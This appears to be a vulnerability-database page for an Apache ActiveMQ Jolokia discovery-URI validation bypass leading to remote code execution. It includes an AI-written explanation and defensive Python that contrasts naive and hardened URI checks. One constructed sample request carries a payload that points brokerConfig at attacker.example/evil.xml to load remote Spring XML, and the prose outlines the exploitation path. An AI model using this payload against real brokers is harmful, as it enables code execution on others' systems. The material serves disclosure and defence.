CVE-2026-45505
Description
A bypass of the fix for CVE-2026-34197 in Apache ActiveMQ allows authenticated attackers to achieve remote code execution via non-parenthesized discovery wrappers.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The original vulnerability (CVE-2026-34197) allowed authenticated attackers to invoke Jolokia JMX operations that accept a discovery URI and point it at the VM transport with a brokerConfig parameter, so that the broker loaded a remote Spring XML context and executed arbitrary code. The fix for that CVE added validation intended to reject such discovery URIs. CVE-2026-45505 reports that this validation does not recognize the non-parenthesized composite spelling of a wrapper URI: forms such as masterslave:vm://...,... and static:vm://... pass the check even though they wrap the same vm:// transport and the same brokerConfig parameter. Affected components are Apache ActiveMQ Broker, ActiveMQ All and ActiveMQ, in versions before 5.19.7 and in 6.0.0 and later before 6.2.6 [1].
Exploitation
An authenticated attacker with access to the web console's Jolokia endpoint (/api/jolokia/) can submit a discovery URI written with a non-parenthesized wrapper (e.g., masterslave:vm://...,...). The URI passes the validation added by the earlier fix, and the inner vm:// transport is still created, so its brokerConfig parameter still loads a remote Spring XML application context through ResourceXmlApplicationContext. No privileges beyond authentication to the web console are required [1].
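The following Python is an added illustration, not Apache ActiveMQ's code and not the actual fix or bypass patch. It models the two spellings of an ActiveMQ composite URI, scheme:(a,b) and the equivalent scheme:a,b, to show why a validator that only unwraps the parenthesized form misses the non-parenthesized one described in the two paragraphs above, and it reuses the hardened check to flag constructed Jolokia exec requests. The wrapper scheme names, the vm:// brokerConfig parameter and the two composite spellings are documented ActiveMQ URI syntax; the MBean name, the addNetworkConnector operation and every sample request are assumptions made for the example.

```python
"""Discovery-URI validation model for the CVE-2026-45505 bypass class.

Illustrative code only, not Apache ActiveMQ's code and not the real fix or bypass
patch. It models ActiveMQ's composite-URI syntax, scheme:(a,b) and the equivalent
scheme:a,b, to show why unwrapping only the parenthesized form misses the other.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Composite ("wrapper") schemes that carry a list of inner transport URIs.
WRAPPER_SCHEMES = {"failover", "static", "masterslave", "fanout", "discovery"}
# vm:// transport parameters that load a broker XML configuration (lower-cased).
DANGEROUS_VM_PARAMS = {"brokerconfig"}
# Matches only the parenthesized wrapper spelling: scheme:(inner)?options
PAREN_WRAPPER = re.compile(r"^(\w+):\((.*)\)(\?.*)?$", re.DOTALL)


def vm_has_dangerous_param(uri: str) -> bool:
    """True if `uri` is a vm:// URI carrying brokerConfig (case-insensitive)."""
    parts = urlsplit(uri)
    if parts.scheme.lower() != "vm":
        return False
    query = parse_qs(parts.query, keep_blank_values=True)
    return any(key.lower() in DANGEROUS_VM_PARAMS for key in query)


def split_top_level(s: str) -> list[str]:
    """Split on commas that are not nested inside parentheses."""
    parts, depth, start = [], 0, 0
    for i, ch in enumerate(s):
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            parts.append(s[start:i])
            start = i + 1
    parts.append(s[start:])
    return [p.strip() for p in parts if p.strip()]


def split_composite(uri: str) -> list[str]:
    """Inner URIs of a wrapper URI in either spelling, or [] if not a wrapper."""
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() not in WRAPPER_SCHEMES:
        return []
    if not rest.startswith("("):
        return split_top_level(rest)  # non-parenthesized spelling
    depth = 0
    for i, ch in enumerate(rest):  # locate the ')' closing the opening '('
        depth += (ch == "(") - (ch == ")")
        if depth == 0:
            return split_top_level(rest[1:i])
    raise ValueError("unbalanced parentheses in composite URI")


def naive_is_blocked(uri: str) -> bool:
    """Model of a check that only looks inside scheme:(...) wrappers."""
    m = PAREN_WRAPPER.match(uri)
    inner = m.group(2) if m else uri
    return any(vm_has_dangerous_param(p) for p in inner.split(","))


def hardened_is_blocked(uri: str, _depth: int = 0) -> bool:
    """Unwrap every composite layer, in both spellings, then inspect the leaves."""
    if _depth > 8:
        raise ValueError("composite URI nested too deeply")
    inner = split_composite(uri)
    if inner:
        return any(hardened_is_blocked(p, _depth + 1) for p in inner)
    return vm_has_dangerous_param(uri)


def flag_jolokia_requests(requests: list[dict]) -> list[int]:
    """Indexes of Jolokia 'exec' requests whose string arguments carry a blocked URI."""
    flagged = []
    for i, req in enumerate(requests):
        if req.get("type") != "exec":
            continue
        for arg in req.get("arguments", []):
            try:
                hit = isinstance(arg, str) and hardened_is_blocked(arg)
            except ValueError:  # malformed URI: fail closed
                hit = True
            if hit:
                flagged.append(i)
                break
    return flagged


# Constructed sample Jolokia request bodies, not captured traffic. The MBean name
# and the operation are assumed for illustration; the advisory names neither.
BROKER_MBEAN = "org.apache.activemq:type=Broker,brokerName=localhost"
SAMPLE_REQUESTS = [
    {"type": "read", "mbean": BROKER_MBEAN, "attribute": "BrokerVersion"},
    {"type": "exec", "mbean": BROKER_MBEAN, "operation": "addNetworkConnector",
     "arguments": ["static:(tcp://peer.example:61616)"]},
    {"type": "exec", "mbean": BROKER_MBEAN, "operation": "addNetworkConnector",
     "arguments": ["masterslave:vm://localhost?brokerConfig=xbean:http://attacker.example/evil.xml,vm://localhost"]},
]
```

For the third sample request, naive_is_blocked returns False while hardened_is_blocked returns True, and flag_jolokia_requests(SAMPLE_REQUESTS) returns [2]. The design point is that the check has to operate on the URIs the transport layer will actually create, so every wrapper layer, in every spelling the parser accepts, is unwrapped recursively before any leaf is inspected; a validator that pattern-matches one surface form is only as good as the parser's grammar is narrow.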
Impact
Successful exploitation results in arbitrary code execution in the broker's JVM. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, attacker-controlled bean definitions run while the context is being loaded, for example through bean factory methods such as Runtime.exec(). This compromises the confidentiality, integrity and availability of the broker and potentially of other systems reachable from the broker host [1].
Mitigation
Users should upgrade to Apache ActiveMQ 5.19.7 (5.x line) or 6.2.6 (6.x line), which contain the complete fix for this bypass. No workarounds are documented in the available references. Since exploitation requires authenticating to the web console and reaching /api/jolokia/, limiting network access to the console and the set of accounts that can log in to it reduces exposure, but it is not a substitute for the upgrade [1].
AI Insight generated on Jun 1, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Patches
No patches discovered yet.
Vulnerability mechanics
No source-code context is available for this CVE. Mechanics are only generated when the actual fix diff can be read; without it, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
News mentions
No linked articles in our index yet.